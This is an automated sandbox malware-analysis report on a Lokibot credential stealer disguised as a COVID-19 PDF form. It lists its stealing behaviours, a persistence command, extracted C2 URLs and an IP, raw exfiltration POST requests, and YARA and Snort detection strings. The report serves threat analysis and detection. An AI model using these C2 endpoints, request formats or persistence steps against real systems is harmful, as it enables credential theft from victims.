Windows Analysis Report RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe

Overview

General Information

Sample Name: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Analysis ID: 442954
MD5: ea646520496fd4603aaf0f5778231f0d
SHA1: 5112f3f6ae6a8a7cfac8364433128228c450f203
SHA256: a130cf9df18f1ae304826c98d4e7cfd2e75043b126a1df0c0a36f98a64cde5c2
Tags: exe, lokibot

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains method to dynamically call methods (often used by packers)
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Process Tree

  • System is w10x64
  • RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe (PID: 5708 cmdline: 'C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe' MD5: EA646520496FD4603AAF0F5778231F0D)
    • schtasks.exe (PID: 5504 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/fn1ToJTMzu3Td"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x6ffe7:$des3: 68 03 66 00 00
  • 0x743e4:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x744b0:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack | Loki_1 | Loki Payload | kevoreilly
  • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x13ffc:$a2: last_compatible_version
6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x12fff:$des3: 68 03 66 00 00
  • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00

Sigma Overview

System Summary:

Sigma detected: Suspicious Double Extension
Source: Process started | Author: Florian Roth (rule), @blu3_team (idea) | Data: Command: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, CommandLine: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, CommandLine|base64offset|contains: HR, Image: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, NewProcessName: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, OriginalFileName: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, ParentCommandLine: 'C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe', ParentImage: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, ParentProcessId: 5708, ProcessCommandLine: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, ProcessId: 3704

Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp | Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/fn1ToJTMzu3Td"]}
Multi AV Scanner detection for domain / URL
Source: http://63.141.228.141/32.php/fn1ToJTMzu3Td | Virustotal: Detection: 11%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\qvDFOnW.exe | Virustotal: Detection: 34%
Source: C:\Users\user\AppData\Roaming\qvDFOnW.exe | ReversingLabs: Detection: 19%
Multi AV Scanner detection for submitted file
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Virustotal: Detection: 34%
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | ReversingLabs: Detection: 19%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\qvDFOnW.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Joe Sandbox ML: detected
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 6_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49715 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49715 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49715 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49715 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49717 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49717 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49717 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49717 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49719 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49719 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49719 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49719 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49720 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49720 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49720 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49720 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49721 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49721 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49721 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49721 -> 63.141.228.141:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor | URLs: http://63.141.228.141/32.php/fn1ToJTMzu3Td
Source: Joe Sandbox View | IP Address: 63.141.228.141
Source: Joe Sandbox View | ASN Name: NOCIXUS
Source: global traffic | HTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 63.141.228.141 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: FAC4DD3C | Content-Length: 190 | Connection: close
Source: global traffic | HTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 63.141.228.141 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: FAC4DD3C | Content-Length: 190 | Connection: close
Source: global traffic | HTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 63.141.228.141 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: FAC4DD3C | Content-Length: 163 | Connection: close
Source: global traffic | HTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 63.141.228.141 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: FAC4DD3C | Content-Length: 163 | Connection: close
Source: global traffic | HTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 63.141.228.141 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: FAC4DD3C | Content-Length: 163 | Connection: close
Source: unknown | TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 6_2_00404ED4 recv
Source: unknown | HTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 63.141.228.141 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: FAC4DD3C | Content-Length: 190 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 01 Jul 2021 12:36:31 GMT | Server: Apache | Connection: close | Content-Type: text/html; charset=UTF-8 | Data Raw: (hex dump of the server's HTML "404 Not Found" page body, omitted here)
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.238593884.000000000302F000.00000004.00000001.sdmp | String found in binary or memory: http://63.141.228.141/32.php/fn1ToJTMzu3Td
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.238593884.000000000302F000.00000004.00000001.sdmp | String found in binary or memory: http://63.141.228.141/32.php/fn1ToJTMzu3Td?qM
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221764921.0000000000F67000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com8
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.combi
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.comrsP
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.coms
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.ibsensoftware.com/
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp | String found in binary or memory: https://apple.com
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221579092.0000000000B9B000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_00B8E5600_2_00B8E560
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_00B8E5580_2_00B8E558
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_00B8BCB40_2_00B8BCB4
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF77700_2_04CF7770
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CFB1980_2_04CFB198
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CFA2A80_2_04CFA2A8
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF18080_2_04CF1808
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF18070_2_04CF1807
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF1A5F0_2_04CF1A5F
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF1A600_2_04CF1A60
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_0040549C6_2_0040549C
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_004029D46_2_004029D4
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: String function: 00405B6F appears 42 times
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: qvDFOnW.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: qvDFOnW.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: qvDFOnW.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221579092.0000000000B9B000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.229005900.0000000007110000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSparselyPopulated.dll@ vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.228871654.0000000006E70000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.229926575.000000000EBB0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.230426036.000000000ECA0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.230426036.000000000ECA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221241977.00000000003B6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameInt16ArrayTypeInfo.exe: vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.229331155.0000000009270000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRelativeFileUrl.dllL vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000000.220566722.0000000000886000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameInt16ArrayTypeInfo.exe: vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeBinary or memory string: OriginalFilenameInt16ArrayTypeInfo.exe: vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
